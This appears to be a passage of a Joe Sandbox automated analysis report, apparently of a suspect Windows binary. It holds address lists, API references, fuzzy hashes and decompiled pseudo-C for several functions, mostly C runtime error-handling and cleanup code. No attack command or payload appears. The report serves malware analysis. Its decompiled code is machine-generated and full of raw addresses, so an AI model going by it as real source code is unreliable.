0x013546e0
0x01354741
0x00000000
0x013546e2
0x013546e2
0x013546f0
0x013546f5
0x013546f8
0x013546fa
0x01354875
0x01354877
0x01354878
0x01354879
0x0135487a
0x0135487b
0x0135487c
0x01354881
0x01354884
0x01354885
0x0135488d
0x01354894
0x01354897
0x01354898
0x0135489b
0x0135489f
0x013548a0
0x013548a3
0x013548b3
0x013548d6
0x013548db
0x013548de
0x013548e0
0x01354b96
0x01354b96
0x00000000
0x013548e6
0x013548e6
0x013548e9
0x013548e9
0x013548ec
0x013548f2
0x013548fb
0x013548fd
0x01354900
0x01354907
0x0135490a
0x01354910
0x00000000
0x00000000
0x01354912
0x01354916
0x0135493f
0x0135493f
0x01354918
0x01354918
0x0135491c
0x01354920
0x01354927
0x0135492d
0x00000000
0x0135492f
0x0135492f
0x01354932
0x01354935
0x0135493d
0x00000000
0x00000000
0x00000000
0x00000000
0x0135493d
0x0135492d
0x0135494c
0x0135494c
0x0135494e
0x01354957
0x0135495d
0x01354960
0x01354960
0x01354963
0x01354966
0x01354966
0x01354976
0x01354984
0x01354989
0x01354990
0x01354992
0x00000000
0x01354998
0x0135499e
0x013549ab
0x013549b4
0x013549ba
0x013549c7
0x013549ce
0x013549d3
0x013549d6
0x013549d8
0x01354c16
0x01354c1c
0x01354c1d
0x01354c1e
0x01354c1f
0x01354c20
0x01354c21
0x01354c26
0x01354c29
0x01354c2c
0x01354c2d
0x01354c3f
0x01354c44
0x01354c46
0x01354c4f
0x00000000
0x01354c4f
0x01354c48
0x01354c4b
0x01354c4d
0x00000000
0x00000000
0x01354c55
0x013549de
0x013549de
0x013549ec
0x013549ef
0x01354a05
0x01354a0c
0x01354a11
0x013549f1
0x013549f1
0x013549f9
0x00000000
0x013549fb
0x013549fb
0x01354a01
0x01354a01
0x013549f9
0x01354a18
0x01354a1f
0x01354a22
0x01354b20
0x01354b23
0x01354b30
0x01354b33
0x01354b3b
0x01354b3b
0x01354b25
0x01354b2b
0x01354b2b
0x01354a28
0x01354a28
0x01354a34
0x01354a3a
0x01354a40
0x01354a43
0x01354a49
0x01354a4c
0x01354a4f
0x00000000
0x00000000
0x01354a51
0x01354a5a
0x01354a5e
0x01354a67
0x01354a6b
0x01354a6c
0x01354a72
0x01354a78
0x01354a7e
0x01354a81
0x00000000
0x00000000
0x01354a83
0x01354aa2
0x01354aa2
0x01354aa5
0x01354ac2
0x01354ac7
0x01354aca
0x01354acc
0x01354b0a
0x01354ace
0x01354ace
0x01354ad4
0x01354ad9
0x01354ae1
0x01354ae2
0x01354ae2
0x01354af9
0x01354b00
0x01354b03
0x01354b05
0x01354b05
0x01354b10
0x01354b16
0x01354b16
0x01354b1b
0x00000000
0x01354b1b
0x01354a85
0x01354a87
0x01354a8c
0x01354a92
0x01354a9b
0x01354a9e
0x01354a9e
0x00000000
0x01354a87
0x01354b3e
0x01354b3e
0x01354b42
0x01354b4a
0x01354b50
0x01354b53
0x01354b59
0x01354b5b
0x01354ba7
0x01354bad
0x01354bb4
0x01354bb4
0x01354bba
0x01354bbe
0x00000000
0x01354bc0
0x01354bc4
0x01354bcd
0x01354bd9
0x01354be7
0x01354bed
0x01354bf0
0x01354bf0
0x01354bbe
0x01354bff
0x01354c07
0x01354c10
0x01354b5d
0x01354b63
0x01354b6d
0x01354b7f
0x01354b86
0x01354b93
0x00000000
0x01354b93
0x00000000
0x01354b5b
0x013549d8
0x01354950
0x01354b98
0x01354b9c
0x01354b9d
0x01354ba6
0x01354ba6
0x00000000
0x0135494e
0x01354947
0x01354949
0x01354949
0x00000000
0x01354949
0x01354700
0x01354700
0x01354703
0x01354708
0x01354870
0x00000000
0x0135470e
0x01354710
0x01354718
0x0135471e
0x0135471f
0x01354725
0x01354726
0x0135472b
0x01354731
0x01354734
0x01354736
0x01354738
0x01354739
0x01354739
0x01354747
0x01354747
0x0135474a
0x0135474d
0x0135474f
0x01354752
0x01354754
0x01354754
0x01354757
0x01354757
0x0135475a
0x0135475d
0x00000000
0x01354763
0x01354763
0x01354765
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01354765
0x0135475d
0x01354708
0x013546fa
0x013546cd
0x013546cf
0x013546d0
0x013546d3
0x00000000
0x00000000
0x00000000
0x00000000
0x013546d3
0x013546cb
0x01354653
0x00000000
0x01354647
0x00000000
0x0135476b
0x0135461a
0x0135460f
0x01354604
0x013545bd
0x013545bd
0x013545bf
0x013545c1
0x013545c2
0x013545c3
0x013545c4
0x013545c9
0x01354861
0x01354865
0x01354866
0x0135486f
0x0135486f
0x013545bb
0x00000000

APIs

Part of subcall function 013576ED: RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,0135BEE9,00000220,0135F479,00013385,?,?,?,?,00000000,00000000,?,0135F479), ref: 0135771F

_free.LIBCMT ref: 01354506
_free.LIBCMT ref: 0135451D
_free.LIBCMT ref: 0135453A
_free.LIBCMT ref: 01354555
_free.LIBCMT ref: 0135456C

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 014462a1a504dc546bdd5e8457f68d166857b1b6d1e994c17c7607d561216fe7
Instruction ID: 3169d5f8380c3c3f9c73f92de62114d75da84378b9d47d6a989a070b8097b72a
Opcode Fuzzy Hash: 014462a1a504dc546bdd5e8457f68d166857b1b6d1e994c17c7607d561216fe7
Instruction Fuzzy Hash: 3551B172A00205DFDB69DF6DC841E6A7BF5EF58B28B040A69ED09D7650F731EA40CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01308840, Relevance: 6.1, APIs: 4, Instructions: 86
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E01308840(void* __ebx, signed int __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t61;
				long _t64;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				signed int* _t89;
				void* _t93;

				_t61 = __ecx;
				_push(__ebx);
				_t80 = __ecx;
				 *__ecx = 0x1396af4;
				_t60 =  *((intOrPtr*)(__ecx + 0x64));
				_t87 =  *((intOrPtr*)(__ecx + 0x60));
				if( *((intOrPtr*)(__ecx + 0x60)) ==  *((intOrPtr*)(__ecx + 0x64))) {
					L9:
					_push(_t61);
					E0130A810( *(_t80 + 0x60),  *(_t80 + 0x64));
					_t93 = _t93 + 4;
					 *(_t80 + 0x64) =  *(_t80 + 0x60);
					CloseHandle( *0x13a4b80);
					E013091A0(_t80);
					_t41 =  *((intOrPtr*)(_t80 + 0x80));
					if(_t41 >= 0x10) {
						_push(_t41 + 1);
						E012F56A0(_t60, _t80,  *((intOrPtr*)(_t80 + 0x6c)));
						_t93 = _t93 + 8;
					}
					 *(_t80 + 0x7c) = 0;
					 *((intOrPtr*)(_t80 + 0x80)) = 0xf;
					 *((char*)(_t80 + 0x6c)) = 0;
					_t64 =  *(_t80 + 0x60);
					if(_t64 != 0) {
						_push(_t64);
						E0130A810(_t64,  *(_t80 + 0x64));
						_push((((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4 >> 0x1f) + ((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4)) * 8 - ((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4 >> 0x1f) + ((0x92492493 * ( *(_t80 + 0x68) -  *(_t80 + 0x60)) >> 0x20) +  *(_t80 + 0x68) -  *(_t80 + 0x60) >> 4) << 2);
						E012F56A0(_t60, _t80,  *(_t80 + 0x60));
						 *(_t80 + 0x60) = 0;
						_t93 = _t93 + 0xc;
						 *(_t80 + 0x64) = 0;
						 *(_t80 + 0x68) = 0;
					}
					_t42 =  *((intOrPtr*)(_t80 + 0x30));
					if(_t42 >= 0x10) {
						_push(_t42 + 1);
						E012F56A0(_t60, _t80,  *((intOrPtr*)(_t80 + 0x1c)));
						_t93 = _t93 + 8;
					}
					 *(_t80 + 0x2c) = 0;
					_t61 = _t80;
					 *((intOrPtr*)(_t80 + 0x30)) = 0xf;
					 *((char*)(_t80 + 0x1c)) = 0;
					_pop(_t80);
					_pop(_t60);
				} else {
					do {
						PostQueuedCompletionStatus( *0x13a4b80, 0, 2, 0);
						WaitForSingleObject( *(__esi + 0x18), 0x3e8);
						FindCloseChangeNotification( *(__esi + 0x18)); // executed
						__esi = __esi + 0x1c;
					} while (__esi != __ebx);
					goto L9;
				}
				_push(_t80);
				_t81 = _t61;
				_t65 =  *((intOrPtr*)(_t81 + 4));
				 *_t81 = 0x1384440;
				if( *((intOrPtr*)(_t81 + 4)) != 0) {
					E01304470(_t65, _t81);
				}
				E01304030(_t81 + 0x10, _t81 + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x10)) + 4)));
				_push(0x40);
				_t45 = E012F56A0(_t60, _t81,  *((intOrPtr*)(_t81 + 0x10)));
				_t89 =  *(_t81 + 8);
				if(_t89 == 0) {
					L7:
					return _t45;
				} else {
					_t83 = _t81 | 0xffffffff;
					_t45 = _t83;
					asm("lock xadd [esi+0x4], eax");
					if(_t83 != 0) {
						goto L7;
					}
					_t45 =  *( *_t89)();
					asm("lock xadd [esi+0x8], edi");
					if(_t83 != 1) {
						goto L7;
					}
					_t45 =  *_t89;
					goto ( *((intOrPtr*)( *_t89 + 4)));
				}
			}

0x01308840
0x01308840
0x01308843
0x01308845
0x0130884b
0x0130884e
0x01308853
0x01308885
0x01308888
0x0130888c
0x01308894
0x01308897
0x013088a0
0x013088a8
0x013088ad
0x013088b6
0x013088b9
0x013088bd
0x013088c2
0x013088c2
0x013088c5
0x013088cc
0x013088d6
0x013088da
0x013088df
0x013088e4
0x013088e5
0x01308911
0x01308913
0x01308918
0x0130891f
0x01308922
0x01308929
0x01308929
0x01308930
0x01308936
0x01308939
0x0130893d
0x01308942
0x01308942
0x01308945
0x0130894c
0x0130894e
0x01308955
0x01308959
0x0130895b
0x01308855
0x01308855
0x01308861
0x0130886f
0x01308878
0x0130887e
0x01308881
0x00000000
0x01308855
0x01303bf1
0x01303bf2
0x01303bf4
0x01303bf7
0x01303bff
0x01303c02
0x01303c02
0x01303c13
0x01303c18
0x01303c1c
0x01303c21
0x01303c29
0x01303c4e
0x01303c50
0x01303c2b
0x01303c2b
0x01303c2e
0x01303c30
0x01303c35
0x00000000
0x00000000
0x01303c3b
0x01303c3d
0x01303c43
0x00000000
0x00000000
0x01303c45
0x01303c4b
0x01303c4b

APIs

PostQueuedCompletionStatus.KERNEL32(00000000,00000002,00000000,?,?,?,0130881B), ref: 01308861
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,0130881B), ref: 0130886F
FindCloseChangeNotification.KERNELBASE(?,?,?,?,0130881B), ref: 01308878
CloseHandle.KERNEL32 ref: 013088A0

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Close$ChangeCompletionFindHandleNotificationObjectPostQueuedSingleStatusWait
String ID:
API String ID: 915711087-0
Opcode ID: 5173a33c0909f43dda5a9552999a6938b6ae4b0c0b8b15bb04b6f2df2f6c7d4a
Instruction ID: 93f4ea284c4fbb499a5c47763a7dc751478739181b1435e381ca2dfc10408bc7
Opcode Fuzzy Hash: 5173a33c0909f43dda5a9552999a6938b6ae4b0c0b8b15bb04b6f2df2f6c7d4a
Instruction Fuzzy Hash: 0C317371610A03AFE719AF28EC64B69BFAAFF50318F444128E50197AD1C775B874CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 013559E0, Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E013559E0(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t30;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x13a4200; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E013561F6(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t30 = E01355C32(1, 0x364); // executed
						_t51 = _t30;
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E013561F6(__eflags,  *0x13a4200, _t51);
							if(__eflags != 0) {
								E0135580E(_t51, 0x13ab4a8);
								E01355C8F(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E013561F6(__eflags,  *0x13a4200, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E013561F6(0,  *0x13a4200, 0);
							_push(0);
							L9:
							E01355C8F();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E013561B7(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x13a4200; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E0134B472(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x13a4200; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E013561F6(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E01355C32(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E013561F6(__eflags,  *0x13a4200, _t60);
								if(__eflags != 0) {
									E0135580E(_t60, 0x13ab4a8);
									E01355C8F(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E013561F6(__eflags,  *0x13a4200, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E013561F6(__eflags,  *0x13a4200, _t20);
								_push(_t60);
								L25:
								E01355C8F();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E013561B7(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x13a4200; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E0134B472(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x13a4200; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E013561F6(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E01355C32(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E013561F6(__eflags,  *0x13a4200, _t54);
											if(__eflags != 0) {
												E0135580E(_t54, 0x13ab4a8);
												E01355C8F(0);
												goto L45;
											} else {
												_t40 = 0;
												E013561F6(__eflags,  *0x13a4200, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E013561F6(0,  *0x13a4200, 0);
											_push(0);
											L41:
											E01355C8F();
											goto L36;
										}
									}
								} else {
									_t54 = E013561B7(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x13a4200; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x013559e0
0x013559e0
0x013559eb
0x013559ed
0x013559f2
0x013559f5
0x01355a13
0x01355a16
0x01355a1b
0x01355a1d
0x00000000
0x01355a1f
0x01355a26
0x01355a2b
0x01355a2e
0x01355a2f
0x01355a31
0x01355a56
0x01355a58
0x01355a71
0x01355a78
0x01355a7d
0x00000000
0x01355a5a
0x01355a5a
0x01355a63
0x01355a68
0x00000000
0x01355a68
0x01355a33
0x01355a33
0x01355a33
0x01355a3c
0x01355a41
0x01355a42
0x01355a42
0x01355a47
0x00000000
0x01355a47
0x01355a31
0x013559f7
0x013559fd
0x01355a01
0x01355a0e
0x00000000
0x01355a03
0x01355a06
0x01355a80
0x01355a80
0x01355a08
0x01355a08
0x01355a08
0x01355a0a
0x01355a0a
0x01355a0a
0x01355a06
0x01355a01
0x01355a83
0x01355a8b
0x01355a8d
0x01355a8f
0x01355a97
0x01355a9c
0x01355a9d
0x01355aa2
0x01355aa3
0x01355aa6
0x01355ac0
0x01355ac3
0x01355ac8
0x01355aca
0x00000000
0x01355acc
0x01355ad8
0x01355adb
0x01355adc
0x01355ade
0x01355b01
0x01355b03
0x01355b1a
0x01355b21
0x01355b26
0x00000000
0x01355b05
0x01355b0c
0x01355b11
0x00000000
0x01355b11
0x01355ae0
0x01355ae7
0x01355aec
0x01355aed
0x01355aed
0x01355af2
0x00000000
0x01355af2
0x01355ade
0x01355aa8
0x01355aae
0x01355ab0
0x01355ab2
0x01355abb
0x00000000
0x01355ab4
0x01355ab4
0x01355ab7
0x01355b31
0x01355b31
0x01355b36
0x01355b39
0x01355b3a
0x01355b3b
0x01355b42
0x01355b44
0x01355b49
0x01355b4c
0x01355b6a
0x01355b6d
0x01355b72
0x01355b74
0x00000000
0x01355b76
0x01355b82
0x01355b86
0x01355b88
0x01355bad
0x01355baf
0x01355bc8
0x01355bcf
0x00000000
0x01355bb1
0x01355bb1
0x01355bba
0x01355bbf
0x00000000
0x01355bbf
0x01355b8a
0x01355b8a
0x01355b8a
0x01355b93
0x01355b98
0x01355b99
0x01355b99
0x00000000
0x01355b9e
0x01355b88
0x01355b4e
0x01355b54
0x01355b56
0x01355b58
0x01355b65
0x00000000
0x01355b5a
0x01355b5a
0x01355b5d
0x01355bd7
0x01355bd7
0x01355b5f
0x01355b5f
0x01355b5f
0x01355b5f
0x01355b61
0x01355b61
0x01355b61
0x01355b5d
0x01355b58
0x01355bda
0x01355be2
0x01355be4
0x01355be4
0x01355beb
0x01355ab9
0x01355b29
0x01355b29
0x01355b2b
0x00000000
0x01355b2d
0x01355b30
0x01355b30
0x01355b2b
0x01355ab7
0x01355ab2
0x01355a91
0x01355a96
0x01355a96

APIs

GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
_free.LIBCMT ref: 01355A42
_free.LIBCMT ref: 01355A78
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 5276bbba8f8e81f77011a6ffa34af4928c609fe90df18937c961311b3d45fe4b
Instruction ID: 8801e91ef5a67ef7baf4a209ff5b984fb1244c9178b0a03f99102ea0e49ed850
Opcode Fuzzy Hash: 5276bbba8f8e81f77011a6ffa34af4928c609fe90df18937c961311b3d45fe4b
Instruction Fuzzy Hash: 8E11CA726003076EF7A225BC6CC1D77255D9BE1F7DB590234FE25921D6EF60AC014260

Uniqueness

Uniqueness Score: -1.00%

Function 0134A818, Relevance: 4.6, APIs: 3, Instructions: 141
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E0134A818(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t70;
				signed int _t71;
				char _t72;
				void* _t75;
				signed int _t80;
				signed int _t84;
				signed int _t95;
				signed int _t106;
				signed int _t110;
				void* _t111;
				char _t116;
				void* _t120;
				signed int _t125;
				signed int _t126;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t143;
				void* _t145;
				char _t155;
				intOrPtr* _t157;
				intOrPtr _t159;
				void* _t160;
				signed int _t163;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edx;
				_push(__ebx);
				_push(__esi);
				_t163 = __ecx;
				_push(__edi);
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t70 =  *((intOrPtr*)(__ecx));
				_push( *_t70); // executed
				L21(); // executed
				_t157 = _t70;
				_pop(_t129);
				if(_t157 == 0) {
					L4:
					_t71 = 0;
					goto L5;
				} else {
					_t72 = E013559E0(_t129, __edx);
					_v12 = _t72;
					_t125 = 0;
					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
					_t131 =  *(_t72 + 0x48);
					_v16 = _t131;
					_v8 = 0;
					_t75 = E01357DB0(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
					_t170 = _t169 + 0x18;
					if(_t75 == 0) {
						_t126 = E013576ED(_v8 + 4);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L4;
						} else {
							_t131 =  &_v20;
							_t13 = _t126 + 4; // 0x4
							_t80 = E01357DB0(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
							_t170 = _t170 + 0x18;
							__eflags = _t80;
							if(_t80 == 0) {
								_t133 = _t131 | 0xffffffff;
								_t159 = _v20;
								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
								__eflags =  *(_t159 + _t16 + 0x24);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
										E01355C8F( *((intOrPtr*)(_t159 + _t19 + 0x24)));
										_pop(_t143);
										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
										_t133 = _t143 | 0xffffffff;
										__eflags = _t133;
									}
								}
								_t155 = _v12;
								_t84 =  *0x13a4478; // 0xfffffffe
								__eflags =  *(_t155 + 0x350) & _t84;
								if(( *(_t155 + 0x350) & _t84) == 0) {
									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
									__eflags =  *(_t159 + _t32 + 0x24);
									if( *(_t159 + _t32 + 0x24) != 0) {
										asm("lock xadd [eax], ecx");
										__eflags = _t133 == 1;
										if(_t133 == 1) {
											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0xc7d81
											E01355C8F( *((intOrPtr*)(_t159 + _t35 + 0x24)));
											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
											_t37 = _t159 + 0x24 + _t95 * 8;
											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
											__eflags =  *_t37;
										}
									}
								}
								_t43 = _t159 + 0xc; // 0x55ff8b00
								_t44 = _t126 + 4; // 0x4
								_t71 = _t44;
								 *_t126 =  *_t43;
								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
								L5:
								return _t71;
							} else {
								__eflags = _t80 - 0x16;
								if(_t80 == 0x16) {
									L19:
									_t125 = 0;
									__eflags = 0;
									goto L20;
								} else {
									__eflags = _t80 - 0x22;
									if(_t80 == 0x22) {
										goto L19;
									} else {
										E01355C8F(_t126);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t75 == 0x16 || _t75 == 0x22) {
							L20:
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							E013496E7();
							asm("int3");
							_t167 = _t170;
							_push(_t131);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t163);
								_push(_t157);
								_t160 = 0;
								_t106 = E01357AF1( &_v12, 0, 0, _a4, 0x7fffffff);
								_t171 = _t170 + 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									L26:
									_t163 = E01355C32(_v12, 2);
									_pop(_t145);
									__eflags = _t163;
									if(_t163 == 0) {
										L32:
										E01355C8F(_t163);
										return _t160;
									} else {
										_t110 = E01357AF1(_t160, _t163, _v12, _a4, 0xffffffff);
										_t171 = _t171 + 0x14;
										__eflags = _t110;
										if(_t110 == 0) {
											_t111 = E01354374(_t145, _t153, _v0, _t163); // executed
											_t160 = _t111;
											goto L32;
										} else {
											__eflags = _t110 - 0x16;
											if(_t110 == 0x16) {
												goto L33;
											} else {
												__eflags = _t110 - 0x22;
												if(_t110 == 0x22) {
													goto L33;
												} else {
													goto L32;
												}
											}
										}
									}
								} else {
									__eflags = _t106 - 0x16;
									if(_t106 == 0x16) {
										L33:
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										E013496E7();
										asm("int3");
										_push(_t167);
										E01356513();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t116 = 4;
										_v100 = _t116;
										_v104 = _t116;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t120 = E0134A7BD(_t125, _t160, _t163, __eflags); // executed
										return _t120;
									} else {
										__eflags = _t106 - 0x22;
										if(_t106 == 0x22) {
											goto L33;
										} else {
											goto L26;
										}
									}
								}
							} else {
								return E01354374(_t131, _t153, _v0, 0);
							}
						} else {
							goto L4;
						}
					}
				}
			}

0x0134a818
0x0134a820
0x0134a821
0x0134a822
0x0134a824
0x0134a828
0x0134a82a
0x0134a82c
0x0134a82e
0x0134a833
0x0134a836
0x0134a839
0x0134a87e
0x0134a87e
0x00000000
0x0134a83b
0x0134a83b
0x0134a840
0x0134a843
0x0134a848
0x0134a84b
0x0134a858
0x0134a85d
0x0134a860
0x0134a865
0x0134a86a
0x0134a891
0x0134a894
0x0134a896
0x00000000
0x0134a898
0x0134a898
0x0134a8a2
0x0134a8a8
0x0134a8ad
0x0134a8b0
0x0134a8b2
0x0134a8d1
0x0134a8d4
0x0134a8db
0x0134a8df
0x0134a8e1
0x0134a8e5
0x0134a8e9
0x0134a8f1
0x0134a8f5
0x0134a8fc
0x0134a901
0x0134a906
0x0134a906
0x0134a906
0x0134a8e9
0x0134a909
0x0134a90c
0x0134a911
0x0134a917
0x0134a91f
0x0134a923
0x0134a925
0x0134a927
0x0134a92b
0x0134a92c
0x0134a934
0x0134a938
0x0134a942
0x0134a944
0x0134a944
0x0134a944
0x0134a944
0x0134a92c
0x0134a925
0x0134a949
0x0134a94c
0x0134a94c
